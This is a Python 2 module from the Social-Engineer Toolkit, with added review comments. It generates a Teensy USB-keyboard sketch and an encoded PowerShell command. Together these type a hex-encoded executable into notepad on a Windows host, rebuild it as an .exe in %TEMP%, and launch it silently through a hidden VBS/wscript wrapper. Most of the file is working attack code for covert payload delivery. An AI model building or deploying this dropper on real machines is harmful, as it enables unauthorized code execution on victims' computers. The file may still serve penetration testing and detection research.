#!/usr/bin/python
# Teensy "SDCard to Teensy Creator" module (SET, BSides LV).  Python 2 only:
# print statements, raw_input(), file() and unicode() are used throughout.
#
# What the script does, in order (everything is visible below):
#   1. prompts for a local file and hex-encodes it into ./converts.txt;
#   2. builds a PowerShell one-liner that reverses that hex encoding on the host
#      the device is plugged into, and base64-encodes it for -EncodedCommand;
#   3. renders a Teensy/Arduino sketch, ./teensy.pde, that types converts.txt
#      from the SD card into notepad and then launches the decoder.
#
# Local artifacts written: converts.txt and teensy.pde, both in the current
# working directory.  Per the sketch template below, on the receiving host the
# names are %TEMP%\<random>.txt, %TEMP%\<random>.txt.exe, %TEMP%\<random>.vbs and
# %TEMP%\<random>.bat, and the processes involved are notepad, cmd,
# "powershell -EncodedCommand" and wscript, all started from what the sketch
# calls the run bar (CommandAtRunBar) -- these are the observable points an
# analyst would look for.
import binascii , base64 , sys , os , random , string , subprocess , socket
from src . core . setcore import *
from src . core . dictionaries import *
from src . core . menu . text import *
################################################################################################
#
# BSIDES LV SDCARD to Teensy Creator
#
# by Josh Kelley (@winfang98)
# Dave Kennedy (@dave_rel1k)
#
################################################################################################
################################################################################################
################################################################################################
# print main stuff for the application
print """
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
BSIDES Las Vegas - - - - SDCard to Teensy Creator
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Written by : Josh Kelley ( @winfang98 ) and Dave Kennedy ( ReL1K , @dave_rel1k )
This tool will read in a file from the Teensy SDCard , not mount it via
Windows and perform a hex to binary conversion via Powershell . It requires
you to have a Teensy device with a soldered USB device on it and place the
file that this tool outputs in order to successfully complete the task .
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard .
"""
# banner.  (The original note here claimed msfpayload had been checked for;
# nothing above performs such a check, so it was stale and has been dropped.)
print """
. - . . - . . . . - . . - . . - . . - . . - . . . . - . . - . . - .
| . . | - | | \| | . . ` - . | | - | ( | \/ | | | | ) | -
` - ' ` ' ' ` `- ' ` - ' ' ` - ' ' ' ' ` ` - ' `- ' ` - '
enabled . \n """
# grab the path and filename from user
path = raw_input ( setprompt ( [ " 6 " ] , " Path to the file you want deployed on the teensy SDCard " ) )
# Re-prompt until the path names an existing regular file; the loop only exits
# when os.path.isfile() succeeds (EOF / KeyboardInterrupt are not handled here).
if not os . path . isfile ( path ) :
while 1 :
print_warning ( " Filename not found, try again " )
path = raw_input ( setprompt ( [ " 6 " ] , " Path to the file you want deployed on the teensy SDCard " ) )
if os . path . isfile ( path ) : break
print_warning ( " Note: This will only deliver the payload, you are in charge of creating the listener if applicable. " )
print_status ( " Converting the executable to a hexadecimal form to be converted later... " )
# Hex-encode the entire input file into ./converts.txt; the generated sketch
# reads this file back from the SD card (see SD.open("converts.txt") below).
fileopen = file ( path , " rb " )
data = fileopen . read ( )
data = binascii . hexlify ( data )
filewrite = file ( " converts.txt " , " w " )
filewrite . write ( data )
# NOTE(review): neither handle is closed here.  `filewrite` is only rebound at
# the teensy.pde write further down, so converts.txt is flushed when that
# object goes away rather than at an explicit close().
print " [*] File converted successfully. It has been expored in the working directory under ' converts.txt ' . Copy this one file to the teensy SDCard. "
# C comment header that opens the generated sketch.
output_variable = " /* \n Teensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K) \n Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile \n */ \n \n "
# this is used to write out the file
# Name of the scratch .txt the sketch has notepad save under %TEMP% on the host;
# the PowerShell one-liner below reads the same name back from AppData\Local\Temp.
random_filename = generate_random_string ( 8 , 15 ) + " .txt "
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
# The one-liner reads the typed hex from Temp, strips CR/LF, parses each two-char
# pair as a byte and writes the result as <random_filename>.exe in the same
# directory.  Both %s slots are random_filename.
powershell_command = unicode ( " $s=gc \" $HOME \\ AppData \\ Local \\ Temp \\ %s \" ;$s=[string]::Join( ' ' ,$s);$s=$s.Replace( ' `r ' , ' ' ); $s=$s.Replace( ' `n ' , ' ' );$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| %% { $b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes( \" $HOME \\ AppData \\ Local \\ Temp \\ %s .exe \" ,$b) " % ( random_filename , random_filename ) )
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
# For the ASCII-only command text above, "char + NUL" per character is the same
# byte layout a UTF-16LE encoding would produce, which is what -EncodedCommand
# expects to find under the base64.
blank_command = " "
# loop through each character and insert null byte
for char in powershell_command :
# insert the nullbyte
blank_command + = char + " \x00 "
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64 . b64encode ( powershell_command )
# vbs filename
vbs = generate_random_string ( 10 , 15 ) + " .vbs "
# .batch filename
bat = generate_random_string ( 10 , 15 ) + " .bat "
# write the rest of the teensy code
# Render the sketch.  Everything inside the triple-quoted string is C/Arduino
# source, not Python.  The ten %s placeholders are filled, in order, from the
# tuple on the closing line: (txt, txt, encoded command, vbs, bat, vbs, vbs,
# txt, bat, vbs); `%%` in the template is a literal `%` in the sketch (e.g. %TEMP%).
output_variable + = ( """
#include <avr/pgmspace.h>
#include <SD.h>
/ / Teensy + + LED is 6. Teensy the LED is 11.
int ledPin = 6 ;
void setup ( )
{
BlinkFast ( 2 ) ;
delay ( 5000 ) ;
CommandAtRunBar ( " cmd /c echo 0 > %% TEMP %% \\ \\ %s " ) ;
delay ( 750 ) ;
CommandAtRunBar ( " notepad %% TEMP %% \\ \\ %s " ) ;
delay ( 1000 ) ;
/ / Delete the 0
PRES ( KEY_DELETE ) ;
/ / This is the SS pin on the Teensy . Pin 20 on the Teensy + + . Pin 0 on the Teensy .
const int chipSelect = 20 ;
/ / make sure that the default chip select pin is set to
/ / output , even if you don ' t use it:
pinMode ( 10 , OUTPUT ) ;
/ / see if the card is present and can be initialized :
if ( ! SD . begin ( chipSelect ) ) {
Keyboard . println ( " Card failed, or not present " ) ;
/ / don ' t do anything more:
return ;
}
/ / open the file . note that only one file can be open at a time ,
/ / so you have to close this one before opening another .
/ / Larger the file , more likely it wouldn ' t fit in a normal int var.
/ / This is the workaround for it .
long int filePos ;
long int fileSize ;
File dataFile = SD . open ( " converts.txt " ) ;
if ( dataFile ) {
fileSize = dataFile . size ( ) ;
for ( filePos = 0 ; filePos < = fileSize ; filePos + + ) {
Keyboard . print ( dataFile . read ( ) , BYTE ) ;
delay ( 10 ) ;
}
dataFile . close ( ) ;
}
else {
Keyboard . println ( " error opening converts.txt " ) ;
}
/ / ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST !
delay ( 5000 ) ;
CtrlS ( ) ;
delay ( 2000 ) ;
AltF4 ( ) ;
delay ( 5000 ) ;
/ / Cannot pass entire encoded command because of the start run length
/ / run through cmd
CommandAtRunBar ( " cmd " ) ;
delay ( 1000 ) ;
Keyboard . println ( " powershell -EncodedCommand %s " ) ;
/ / Tweak this delay . Larger files take longer to decode through powershell .
delay ( 10000 ) ;
Keyboard . println ( " echo Set WshShell = CreateObject( \\ " WScript . Shell \\" ) > %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo WshShell.Run chr(34) ^& \\ " % % TEMP % % \\\\% s \\" ^& Chr(34), 0 >> %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo Set WshShell = Nothing >> %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " echo %% TEMP %% \\ \\ %s .exe > %% TEMP %% \\ \\ %s " ) ;
Keyboard . println ( " wscript %% TEMP %% \\ \\ %s " ) ;
delay ( 1000 ) ;
Keyboard . println ( " exit " ) ;
}
void loop ( ) { }
void BlinkFast ( int BlinkRate ) {
int BlinkCounter = 0 ;
for ( BlinkCounter = 0 ; BlinkCounter != BlinkRate ; BlinkCounter + + ) {
digitalWrite ( ledPin , HIGH ) ;
delay ( 80 ) ;
digitalWrite ( ledPin , LOW ) ;
delay ( 80 ) ;
}
}
void AltF4 ( ) {
Keyboard . set_modifier ( MODIFIERKEY_ALT ) ;
Keyboard . set_key1 ( KEY_F4 ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void CtrlS ( ) {
Keyboard . set_modifier ( MODIFIERKEY_CTRL ) ;
Keyboard . set_key1 ( KEY_S ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
/ / Taken from IronGeek
void CommandAtRunBar ( char * SomeCommand ) {
Keyboard . set_modifier ( 128 ) ;
Keyboard . set_key1 ( KEY_R ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
delay ( 1500 ) ;
Keyboard . print ( SomeCommand ) ;
Keyboard . set_key1 ( KEY_ENTER ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void PRES ( int KeyCode ) {
Keyboard . set_key1 ( KeyCode ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
""" % (random_filename,random_filename,powershell_command,vbs,bat,vbs,vbs,random_filename,bat,vbs))
# delete temporary file
# NOTE(review): random_filename is only ever used as a name inside the generated
# sketch; nothing in this script creates a local file by that name, so this rm
# has nothing to remove.  Were a local cleanup needed, os.remove() would do it
# without building a shell command line (shell=True).
subprocess . Popen ( " rm %s 1> /dev/null 2>/dev/null " % ( random_filename ) , shell = True ) . wait ( )
print " [*] Binary to Teensy file exported as teensy.pde "
# write the teensy.pde file out
# Write the rendered sketch next to converts.txt in the working directory.
filewrite = file ( " teensy.pde " , " w " )
# write the teensy.pde file out
filewrite . write ( output_variable )
# close the file
filewrite . close ( )
print """
Instructions :
Copy the converts . txt file to the sdcard on the Teensy device . Use the teensy . pde normally
and use the Arduino IDE to place the latest code in there . Notice that you need to change
some code marked above based on the Teensy and the Teensy + + based on how you soldered the PIN ' s
on .
Happy hacking .
"""
# Hand control back to the SET menu (helper provided by one of the src.core
# star imports at the top of the file).
return_continue ( )